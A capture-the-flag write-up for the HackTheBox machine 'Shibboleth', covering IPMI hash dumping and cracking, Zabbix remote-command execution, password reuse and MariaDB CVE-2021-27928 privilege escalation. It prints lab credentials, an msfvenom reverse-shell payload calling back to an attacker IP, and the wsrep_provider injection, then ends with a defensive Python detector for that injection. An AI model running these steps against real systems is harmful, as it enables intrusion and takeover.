Shibboleth Hackthebox writeup
In this box we are going to enumerate a UDP port and dump the administrator hash, then we will crack it. Using these credentials we will log in to the Zabbix web interface, and using my exploit for this version of Zabbix we will get a low-privilege shell. Re-using the same password will leverage our access to a user. For the root part we will exploit a vulnerable MariaDB version.
Scanning :
basic scanning :
nmap -A -T4 10.10.11.124
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://shibboleth.htb/
Service Info: Host: shibboleth.htb
It was suspicious to have only this port, so I performed a UDP scan as well:
sudo nmap -sU 10.10.11.124
PORT STATE SERVICE
623/udp open asf-rmcp
We can add shibboleth.htb to /etc/hosts and move on to enumeration.
Enumeration :
we can start performing some vhost enumeration :
ffuf -c -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://shibboleth.htb -H "Host: FUZZ.shibboleth.htb" -fc 302
monitor [Status: 200, Size: 3686, Words: 192, Lines: 30]
monitoring [Status: 200, Size: 3686, Words: 192, Lines: 30]
zabbix [Status: 200, Size: 3686, Words: 192, Lines: 30]
and add them to /etc/hosts as well:
10.10.11.124 shibboleth.htb monitor.shibboleth.htb zabbix.shibboleth.htb
The UDP port we found earlier seems worth searching for, and you can find this post from HackTricks.
We can use that to find the version first:

then we can try that :

seems to be IPMI-2.0 UserAuth , from the same post we can see :

we can try that :

and it retrieves a hash , we can see if we can crack it.
from hashcat wiki here

hashcat -m 7300 hash2 /usr/share/wordlists/rockyou.txt
so now we have these credentials Administrator:ilovepumkinpie1
After this point I performed some enumeration of the IPMI, like:
ipmitool -I lanplus -C 0 -H 10.10.11.124 -U Administrator -P ilovepumkinpie1 user list
and others, but it seems I went too far from the foothold :(
now we can take a look at the TCP port 80 we have found earlier
shibboleth.htb is not interesting at all , all pages are static

zabbix.shibboleth.htb has a login page, so obviously I tried the credentials we have

and we are in :

Foothold:
if you look at the footer you will find the zabbix version:

Searching for it I found no exploits. You can start doing your research and you will find in the documentation here that the web interface can execute remote commands.
Actually, to exploit it you will do a lot of searching through different options in the web interface until you find the page.
At this time I was practicing Python, so why not write my first published exploit?

you will find it here

so let’s download it and try using the exploit

and after one minute:

Privilege escalation:
Only one user exists, which is ipmi_svc, and we have the password from the IPMI, so it is worth trying:

and it works
Root Access
Uploading LinPEAS to the box and investigating the output:



As we can see, MariaDB is running locally only, and LinPEAS found the username and the password to connect to the database, so we can try to interact with it.
We can read the file without the comments, since they are not applicable:
cat /etc/zabbix/zabbix_server.conf | grep -v "#"
Now let's try to interact with it:
# password: bloooarskybluh
mysql -u zabbix -D zabbix -p
and we are in:

The MariaDB version we see in the banner is vulnerable to OS command injection, and we can find the exploit here.
Following the steps:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.52 LPORT=1337 -f elf-so -o CVE-2021-27928.so
Set the listener and move the .so file to the box. Then, on the box, log in to the database and run:
MariaDB [zabbix]> SET GLOBAL wsrep_provider="/dev/shm/CVE-2021-27928.so";
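
From the defender's side, the statement above is easy to spot if query auditing is enabled. The following is an added example, not part of the original writeup: it scans audit log lines for changes to wsrep_provider and rates libraries loaded from user-writable directories as high severity. The log layout (MariaDB Audit Plugin style), the sample lines, and the directory list are assumptions constructed for illustration.

```python
import re

# Constructed sample lines, assumed to follow the MariaDB Audit Plugin layout:
# time,serverhost,user,host,connid,queryid,operation,database,'query',retcode
SAMPLE_LOG = """\
20211120 10:14:55,shibboleth,zabbix,localhost,42,1000,QUERY,zabbix,'SELECT userid, alias FROM users',0
20211120 10:15:02,shibboleth,zabbix,localhost,42,1001,QUERY,zabbix,'SET GLOBAL wsrep_provider="/dev/shm/CVE-2021-27928.so"',0
20211120 10:16:40,shibboleth,root,localhost,43,1002,QUERY,,'set global wsrep_provider = "/usr/lib/galera/libgalera_smm.so"',0
20211120 10:17:05,shibboleth,zabbix,localhost,42,1003,QUERY,zabbix,'SHOW VARIABLES LIKE "wsrep_provider"',0
"""

# Matches SET GLOBAL wsrep_provider=... and SET @@GLOBAL.wsrep_provider=...
SET_PROVIDER = re.compile(
    r"""SET\s+(?:GLOBAL\s+|@@GLOBAL\.)wsrep_provider\s*=\s*["']([^"']+)["']""",
    re.IGNORECASE,
)
# Locations an unprivileged local user can normally write to (assumed list).
WRITABLE_DIRS = ("/dev/shm/", "/tmp/", "/var/tmp/", "/home/")


def find_wsrep_provider_changes(log_text):
    """Return one finding per QUERY event that sets wsrep_provider."""
    findings = []
    for line in log_text.splitlines():
        # The query text may contain commas, so split only the 8 leading fields.
        fields = line.split(",", 8)
        if len(fields) < 9 or fields[6] != "QUERY":
            continue
        query, _, retcode = fields[8].rpartition(",")
        match = SET_PROVIDER.search(query)
        if not match:
            continue
        path = match.group(1)
        findings.append({
            "time": fields[0],
            "user": fields[2],
            "path": path,
            "succeeded": retcode == "0",
            # A provider library in a user-writable directory is never routine.
            "severity": "high" if path.startswith(WRITABLE_DIRS) else "review",
        })
    return findings


if __name__ == "__main__":
    for finding in find_wsrep_provider_changes(SAMPLE_LOG):
        print(finding)
```

Any change to wsrep_provider on a server that is not part of a Galera cluster deserves a look, which is why the second match is still reported as "review".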